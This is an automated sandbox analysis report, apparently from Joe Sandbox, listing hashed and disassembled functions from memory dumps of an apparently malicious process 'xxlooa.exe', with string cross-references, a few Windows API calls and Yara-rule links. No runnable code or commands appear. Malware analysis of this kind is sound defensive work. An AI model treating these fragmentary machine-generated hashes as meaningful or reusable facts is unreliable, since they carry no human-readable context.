Opcode ID: e5a3ffb038b1f93ef99e768d530f784158f122f3f90ca317f9d4619ee9cc7b1e
Instruction ID: fff4531cfebe5de12e771fb2481dfdc6e9759160d3643f7323c7505ec2a4c63b
Opcode Fuzzy Hash: e5a3ffb038b1f93ef99e768d530f784158f122f3f90ca317f9d4619ee9cc7b1e
Instruction Fuzzy Hash: CC416B70D05208EFCB14DFA8C6A566EBBB2FF40304F14C99AD0661B765DB318A44DB92

Function 02AA4C00 Relevance: 10.1, Strings: 8, Instructions: 103COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AA5165
$^q, xrefs: 02AA519A
$^q, xrefs: 02AA5173
LR^q, xrefs: 02AA503A
$^q, xrefs: 02AA4EC9
LR^q, xrefs: 02AA5134
$^q, xrefs: 02AA51A6
$^q, xrefs: 02AA4ED5

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2260663106
Opcode ID: e863b1b1fce4039b77b06b567b76682285e770dd33cc24bd3bd3b81823af53ce
Instruction ID: 43e0862069f12154a7951ed14a9f60e13725e3fd581cfcb9e0c99082b208e446
Opcode Fuzzy Hash: e863b1b1fce4039b77b06b567b76682285e770dd33cc24bd3bd3b81823af53ce
Instruction Fuzzy Hash: 73415C70904208DFDB04DFA8C69469EBBF2FF44304F55C99AE41A2B365DB70CA45DB92

Function 02AA60F8 Relevance: 7.8, Strings: 6, Instructions: 262COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02AA6336
LR^q, xrefs: 02AA6344
$^q, xrefs: 02AA6429
$^q, xrefs: 02AA61CD
$^q, xrefs: 02AA6459
LR^q, xrefs: 02AA63F2

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1214618821
Opcode ID: 0f2bf5e51565ff39a252032acfa2b049b2bafff876edf2824923de7f0498db74
Instruction ID: 2a1711ad28ac1c872d4119c343ad46368ca664719e9f9a46e9016ee2dee28161
Opcode Fuzzy Hash: 0f2bf5e51565ff39a252032acfa2b049b2bafff876edf2824923de7f0498db74
Instruction Fuzzy Hash: 17B13C70E04118DFCF04CF99D690AADBBB6FF88B00F298555E406AB255DB30AD85CF90

Function 02AA9F03 Relevance: 6.6, Strings: 5, Instructions: 365COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AAA1C8
$^q, xrefs: 02AAA433
LR^q, xrefs: 02AAA3F0
LR^q, xrefs: 02AAA334
$^q, xrefs: 02AAA470

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: 5e71dbefe3fb48949e5e37ef9382b80afc9d1ed940fd8389919866ccdc6ca353
Instruction ID: e04a7b515cf23a318aa509fc6e3a2b8edd8839597064b26d6c0f89bdafc3a04e
Opcode Fuzzy Hash: 5e71dbefe3fb48949e5e37ef9382b80afc9d1ed940fd8389919866ccdc6ca353
Instruction Fuzzy Hash: 4AE18170E04208DFCB15CFA8C5946AEBBF2FF88300F24C556E416AB356DB349985DB91

Function 02AAA0E0 Relevance: 6.5, Strings: 5, Instructions: 260COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AAA1C8
$^q, xrefs: 02AAA433
LR^q, xrefs: 02AAA3F0
LR^q, xrefs: 02AAA334
$^q, xrefs: 02AAA470

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: 030b4e8388ea8aebf38c870d942ca236b267c83cd090b4826223d16b2aab2bcc
Instruction ID: 5ea4531243062a6a7d613a8dbc605c323a4765e35b1f608234d809b0af0765d3
Opcode Fuzzy Hash: 030b4e8388ea8aebf38c870d942ca236b267c83cd090b4826223d16b2aab2bcc
Instruction Fuzzy Hash: 24B18E70E04218DFCB15CFA8D5946ADB7F2FF88310F258566E806AB356DB34AC81CB91

Function 02AA4DE8 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AA5165
$^q, xrefs: 02AA519A
$^q, xrefs: 02AA4EC9
LR^q, xrefs: 02AA503A
LR^q, xrefs: 02AA5134

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: 1af5e6f8df9af0f8a1029496d8f75a9617de137bfa33b7195f8206bdeeb4124e
Instruction ID: 74a53077d41ba0782913c3bcea03e63caf9cf25f24b968767c5dbb80e21c031c
Opcode Fuzzy Hash: 1af5e6f8df9af0f8a1029496d8f75a9617de137bfa33b7195f8206bdeeb4124e
Instruction Fuzzy Hash: 45A15B70E04118CBCB24DFA8C590ABEB7B2FF88300F258526E416AB355DB749891CB95

Function 02AA4DF8 Relevance: 6.5, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AA5165
$^q, xrefs: 02AA519A
$^q, xrefs: 02AA4EC9
LR^q, xrefs: 02AA503A
LR^q, xrefs: 02AA5134

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: e5a66f791395c5b432f757e38459c524e98f6ca681f3b8c802ea5de231b4d266
Instruction ID: 4f533ce82aac34d5b82187b35ad91775b04299d06bb4bc1425e12748e288433d
Opcode Fuzzy Hash: e5a66f791395c5b432f757e38459c524e98f6ca681f3b8c802ea5de231b4d266
Instruction Fuzzy Hash: 41A12A70E04118CBCB24DF99C590ABEB7B2FF88704F25852AE416AB354DB74E891CB95

Function 02AAA0EB Relevance: 6.5, Strings: 5, Instructions: 247COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AAA1C8
$^q, xrefs: 02AAA433
LR^q, xrefs: 02AAA3F0
LR^q, xrefs: 02AAA334
$^q, xrefs: 02AAA470

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: 151ef440ea82344fabc2038871d4227cd062e12010fcbac6ab3a163edac3eed4
Instruction ID: ce7d0f28195bbc60e62d469567d71b54462a1ca6fe01fbb8e82fd4045056dab8
Opcode Fuzzy Hash: 151ef440ea82344fabc2038871d4227cd062e12010fcbac6ab3a163edac3eed4
Instruction Fuzzy Hash: A4A17F74E04118DFCB18CF99C594AADB7F2FF88310F258516E806AB356DB34AC85CB91

Function 02AAB0C0 Relevance: 6.5, Strings: 5, Instructions: 244COMMON

Download Yara Rule

Strings

$^q, xrefs: 02AAB198
$^q, xrefs: 02AAB3F4
LR^q, xrefs: 02AAB301
LR^q, xrefs: 02AAB3BD
$^q, xrefs: 02AAB431

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q$$^q
API String ID: 0-1346149845
Opcode ID: bb01025e9920cb0b53db9e53c2fc3a103897416e09b50a0218230f633ac62133
Instruction ID: b3ef8452cf1d2bc5c11fa4441453f4660784287c6ed7ae30b33b83e5060166e9
Opcode Fuzzy Hash: bb01025e9920cb0b53db9e53c2fc3a103897416e09b50a0218230f633ac62133
Instruction Fuzzy Hash: 97A16E70E04118CFCB18CFA9D591AADB7F2FF98308F148916E416AB754DB34AC81CBA1

Function 0734F9E8 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

@, xrefs: 0734FAB6
B, xrefs: 0734FA0E
@, xrefs: 0734FA09
Hbq, xrefs: 0734FB05
B, xrefs: 0734FABB

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID: @$@$B$B$Hbq
API String ID: 0-1093311442
Opcode ID: aa85cdecd731bdafa55df55c50eaaf0e98c9c26e751d7947d26029890a6df243
Instruction ID: f6be78582cacc0dfe45d417c647a6b97856ac53ae86ad682d6a572cba7ba6f33
Opcode Fuzzy Hash: aa85cdecd731bdafa55df55c50eaaf0e98c9c26e751d7947d26029890a6df243
Instruction Fuzzy Hash: 4F51A2B27002068FDB18DF78C88096ABBF6FF8921071C856AD51DC7760DB31E946CB91

Function 0734F9D8 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

@, xrefs: 0734FAB6
B, xrefs: 0734FA0E
@, xrefs: 0734FA09
B, xrefs: 0734FABB

Memory Dump Source

Source File: 00000000.00000002.1851463299.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_File.jbxd

Similarity

API ID:
String ID: @$@$B$B
API String ID: 0-685577651
Opcode ID: b7f0d5d0849e263b6b6c6cba9fb13ebfab2081cd73c50ccedcb26867eecf550c
Instruction ID: 9d42c2a64ad1fb6f447d887c1f8cfdbab00a7489d92bbf2a9a9985fb55f10043
Opcode Fuzzy Hash: b7f0d5d0849e263b6b6c6cba9fb13ebfab2081cd73c50ccedcb26867eecf550c
Instruction Fuzzy Hash: B431A0B2B002578FEB18CF7DC88486ABBF9EF8A21472C51A6D509C7261D730EC45CB91

Function 02AAA768 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

Te^q, xrefs: 02AAA77C
Te^q, xrefs: 02AAA78C
Te^q, xrefs: 02AAA7D1
Te^q, xrefs: 02AAA7F3

Memory Dump Source

Source File: 00000000.00000002.1837225951.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2aa0000_File.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q
API String ID: 0-2929563283
Opcode ID: 5d1ff97cf8faa8d993dd18c0e481b6969e87216dc45f567e0b122ec0a71e0e12
Instruction ID: 08d8995e5845a278ba07f6b38c999a737279ce7e08e35e0e17526df90868896c
Opcode Fuzzy Hash: 5d1ff97cf8faa8d993dd18c0e481b6969e87216dc45f567e0b122ec0a71e0e12
Instruction Fuzzy Hash: D311E534A54209EFDB558F99D4B8BAEB7F1BF48700F108816E402DB296CF319845CB91

Analysis Process: xxlooa.exePID: 916, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	19%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	317
Total number of Limit Nodes:	17

Executed Functions

Function 09F31BD4 Relevance: 5.6, Instructions: 5560
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d8660cf6074152f4bb158d8d12c68d810dd15ab52bd2bd185ebb8a6c0460f0
Instruction ID: f24685a82c80061605fc32cf61ef7a060e5e4052a978bec31271dcce6db0a308
Opcode Fuzzy Hash: c0d8660cf6074152f4bb158d8d12c68d810dd15ab52bd2bd185ebb8a6c0460f0
Instruction Fuzzy Hash: 1DB3F474A01218CBCB58BF39D9946ADBBF2FB89211F0084E9D44DA7354DB349E99CF42

Function 09F31BF8 Relevance: 5.5, Instructions: 5545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c90923863bae07bcca800e1c1a9f4d2225596b5b5dba31940ffb3cb166aff30
Instruction ID: 35c60c39723a2576a977165bebc6d43acb9fb742c133864bf1960b732e2e1d08
Opcode Fuzzy Hash: 7c90923863bae07bcca800e1c1a9f4d2225596b5b5dba31940ffb3cb166aff30
Instruction Fuzzy Hash: 14B3F474A01218CBCB58BF39D9946ACBBF2FB89211F0084E9D44DA7354DB349E99CF42

Function 09F3DBAC Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aab24123b8928bdf900379295dac6009ffb01a44bb2aa97b385a0ee7d409c06
Instruction ID: cd6b2315681a321b6f6116c919a5dff991ca72bfa880c3463cd5a12e7512325b
Opcode Fuzzy Hash: 8aab24123b8928bdf900379295dac6009ffb01a44bb2aa97b385a0ee7d409c06
Instruction Fuzzy Hash: B3C15C71E0420ADFCB04CFA9C4809AEFBB2FF89340B65D559D515AB354D738AA82CF90

Function 09F3DB85 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1735fba1076b5c1aef2b205774eb754728e50123f0fcd601005c02f92fd7457
Instruction ID: 7bfb818c74c6077ebaf274b073988da5dee2854f96c4b3d4f4ce32f953849409
Opcode Fuzzy Hash: a1735fba1076b5c1aef2b205774eb754728e50123f0fcd601005c02f92fd7457
Instruction Fuzzy Hash: E1C16D71E0420ADFCB04CFA9C4809AEFBB2FF89340B65D559D515AB355D738AA82CF90

Function 09F3DD90 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf58a1c271ddabb5e2d5f6cb8e2175f0cbc1864bfce7058a1f9b3557481accc1
Instruction ID: 97ef457352e94b786c227140b81c27894a9a6ac1423de2c6a12490371c106f97
Opcode Fuzzy Hash: cf58a1c271ddabb5e2d5f6cb8e2175f0cbc1864bfce7058a1f9b3557481accc1
Instruction Fuzzy Hash: 3FC13C71E0020ADFCB04CFA9C4809AEFBB2FF89340B65D559D515AB354D738AA82CF94

Function 09F30895 Relevance: 3.9, Strings: 3, Instructions: 157COMMON

Download Yara Rule

Strings

S@, xrefs: 09F30984
Te^q, xrefs: 09F309A7
TJcq, xrefs: 09F309BC

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID: S@$TJcq$Te^q
API String ID: 0-991611162
Opcode ID: c6643346ef12a02f0f98356a8d2b6973976590cceee1880408e41678f5e3b5cb
Instruction ID: 237ac99fd42593d17a0c4a0dac5e2b08b84ad30df54d0c5b651f31813f3d0a6e
Opcode Fuzzy Hash: c6643346ef12a02f0f98356a8d2b6973976590cceee1880408e41678f5e3b5cb
Instruction Fuzzy Hash: 48511B6260E3C10FC7139B745C785A97FB69E87110B1E04DBC9C6CB2A3D95C580AC76B

Function 09F3E369 Relevance: 3.8, Strings: 3, Instructions: 66COMMON

Download Yara Rule

Strings

tu}s, xrefs: 09F3E3E8
{ :, xrefs: 09F3E436
tu}s, xrefs: 09F3E3B2

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID: tu}s$tu}s${ :
API String ID: 0-3169588376
Opcode ID: 53ec676af1feab79920984d5fbf83ef8207ade6397e7c85d3fc8a26e10118ef8
Instruction ID: f1251c3de5676ebec01e715dcb87454d9e91cdaa75d6a10ea7f43abf1401c66d
Opcode Fuzzy Hash: 53ec676af1feab79920984d5fbf83ef8207ade6397e7c85d3fc8a26e10118ef8
Instruction Fuzzy Hash: 7C212774E05249DFDB04DFA9C5446AEFFB2BF89300F24C5AAD409AB264D7348B41CB51

Function 09F309A0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

Te^q, xrefs: 09F309A7
TJcq, xrefs: 09F309BC

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 5d3f3ac0ac6ce42584c91b9c8f91318cbb43bc222e060889b6b3fc35fc018398
Instruction ID: cf0a5a73059c2d78d6f2c154b6c0b433b11dc58ec8216f1563b23500511ae685
Opcode Fuzzy Hash: 5d3f3ac0ac6ce42584c91b9c8f91318cbb43bc222e060889b6b3fc35fc018398
Instruction Fuzzy Hash: E6F0F6313000211FCA08A77DE56897E76DBAFC9A20314445EF50ACF3A5CD68DC0787AA

Function 09F3B362 Relevance: 1.8, Strings: 1, Instructions: 519COMMON

Download Yara Rule

Strings

7, xrefs: 09F3B3EC

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 80cdc55d993487cd82ef69bdc407c205840532b127c58a170154e3e971eb1c5b
Instruction ID: c924e71cd3dc4a3b27ad692de8e8b21ec2d0de5f420dabe90283677db136d7ab
Opcode Fuzzy Hash: 80cdc55d993487cd82ef69bdc407c205840532b127c58a170154e3e971eb1c5b
Instruction Fuzzy Hash: F502F170A19648CFC705FB78D89866DBBF2FF4A605F4144AAD485E7391DA388C0AC763

Function 04AE1480 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04AE1541

Memory Dump Source

Source File: 00000010.00000002.2577731133.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4ae0000_xxlooa.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 9cf38cf1cc2ada27410f996c8879be9e3e47a9cbe26e37e1e8027620b45fd718
Instruction ID: 6c83fbe365908b9fe200f9a02b5650b53a68e7abd97d408e527af826e129307e
Opcode Fuzzy Hash: 9cf38cf1cc2ada27410f996c8879be9e3e47a9cbe26e37e1e8027620b45fd718
Instruction Fuzzy Hash: 204129B4A00259CFDB14CF9AC448AAABBF5FB8C314F24C459D519AB321D735E941CFA1

Function 08B6A3BF Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 08B6A468

Memory Dump Source

Source File: 00000010.00000002.2582722561.0000000008B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8b60000_xxlooa.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c94d1a66d5475a5b049ca8308595cc0124eaaaa2beac5e0d26e9f4d866017a2b
Instruction ID: f38d152f6f651da90d4ef0c81d225a2b95ecd0e716e397cea2a51fed6f18f7a0
Opcode Fuzzy Hash: c94d1a66d5475a5b049ca8308595cc0124eaaaa2beac5e0d26e9f4d866017a2b
Instruction Fuzzy Hash: 77217471C097D68FCB02CB68C854399BFB0AF07220F1A41DBC494EB292D3385955CBA6

Function 08B6A3F7 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 08B6A468

Memory Dump Source

Source File: 00000010.00000002.2582722561.0000000008B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8b60000_xxlooa.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 732b322a1a4fce1db3f19c7a1169c9192dc9fca13906ceac9a24c57559a3a845
Instruction ID: 64b2dbb47ddade3aa964c664105ad425864a4165a93fb99d0e924d1adf9f6489
Opcode Fuzzy Hash: 732b322a1a4fce1db3f19c7a1169c9192dc9fca13906ceac9a24c57559a3a845
Instruction Fuzzy Hash: A2214AB2C0066A9FCB10CF9AC5447EEFBB0EF48320F148169D858B7250D338A954CFA5

Function 08B6A3F8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 08B6A468

Memory Dump Source

Source File: 00000010.00000002.2582722561.0000000008B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8b60000_xxlooa.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: e5b8be386080cf95c772af14fa462e99ab8c77986c72b3428f96838e276ed861
Instruction ID: 4b89cf86ae48c6837e59b68efc184a47b03c501465d52136ae1a1e109748d820
Opcode Fuzzy Hash: e5b8be386080cf95c772af14fa462e99ab8c77986c72b3428f96838e276ed861
Instruction Fuzzy Hash: 5D1147B2C0066A9FCB10CF9AC5447DEFBB4EF48720F10816AD858B7240D738A954CFA5

Function 09F3C690 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d772527af3fa90fdcd724ac53c629f9bbd8ee9531fd9228fdc7c4668f9abdd
Instruction ID: d64d02fa699dd0b7a2c625a071ab81a17fd9e659c3591e836efa6c31be3d3518
Opcode Fuzzy Hash: 49d772527af3fa90fdcd724ac53c629f9bbd8ee9531fd9228fdc7c4668f9abdd
Instruction Fuzzy Hash: F712E330A082458FC705BB79D89562EBFF2FF85604F458869E4C9E7281DE389C4AC793

Function 09F3B440 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0609a360e496d6fbd5583bdad39c23087588fdb5337af62445887fafe3054290
Instruction ID: 47fd15da287280dd0e85c5e720dd15c6ca88d1b67e2c79360ed49019b2ea1807
Opcode Fuzzy Hash: 0609a360e496d6fbd5583bdad39c23087588fdb5337af62445887fafe3054290
Instruction Fuzzy Hash: DEE17D70A11608CFC704FFB9E59866DBBF2FB88605F408969E489E7354DE399C0AC752

Function 09F3BC32 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0232a626f439e2ad33e856d71204864832029fbf1494a09f7e18cfcdb095da0a
Instruction ID: fae75eae829b28f86640b83eb207ad0d9f9c980e53f268d07d354b614c5bf622
Opcode Fuzzy Hash: 0232a626f439e2ad33e856d71204864832029fbf1494a09f7e18cfcdb095da0a
Instruction Fuzzy Hash: 98027275E14218CFCB44AF79E45869DBBF2FB58341F8085A9D889E3340EB789C46CB52

Function 09F3AD9C Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331861b9b41e686edc95aa6577626a863c4812b927b406abebf2f26861624631
Instruction ID: f5aaf4ffe871239ba3f9a478756bd155bf5c78270f3dfbb217c922f385d44509
Opcode Fuzzy Hash: 331861b9b41e686edc95aa6577626a863c4812b927b406abebf2f26861624631
Instruction Fuzzy Hash: 9DE1B070A10215CFC704FFB9D59862EBBF2FB88A05F508969E489E7354DA389D06C793

Function 09F3B430 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bb6944f16edef8512445ff7bb5251cf7311653ed50102dc115c31e5bc46c0f
Instruction ID: 3bcffd6869c9b272647eb8260e9cf6c789b761bbcb514f5837a7643bacd3887e
Opcode Fuzzy Hash: c3bb6944f16edef8512445ff7bb5251cf7311653ed50102dc115c31e5bc46c0f
Instruction Fuzzy Hash: 8DE18D70A10608CFCB04FFB9D49866DBBF6FB88605F408969E889E7354DE389C09C752

Function 09F39898 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6603e587531295ceede9fed4547d980d9966ec62ada2654048586362f83bfe9a
Instruction ID: 1a7d1f9886251ccbaa0921ca4e7dc109fff0b9c03765d25cb28490ed165edbba
Opcode Fuzzy Hash: 6603e587531295ceede9fed4547d980d9966ec62ada2654048586362f83bfe9a
Instruction Fuzzy Hash: 28D1A070B10215CBC708BFB9E48966DBBF2FB88605F508569E489D7384DF789C46C792

Function 09F3ADBB Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24997968cf5bb3e62f69484b445642c79bd7a3ec284b0a1486e7e24a4984e183
Instruction ID: c6e8ce538d054c02dbfcbd73e7a0b2272866c70e75658bc5ed880487318d125b
Opcode Fuzzy Hash: 24997968cf5bb3e62f69484b445642c79bd7a3ec284b0a1486e7e24a4984e183
Instruction Fuzzy Hash: 85C1AF70A10615CFC704FFB9D59862EBBF2FB88A05F408969E489E7354DA389D06C793

Function 09F39870 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2583808284.0000000009F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9f30000_xxlooa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046b543814564cad8c6d5a7d8b418d48513a2feed0475cdb234b9c430fc60c68
Instruction ID: aa617a0da51223902953ca9c0e02053ac6a4988543e8ab8274726b23006f6b00
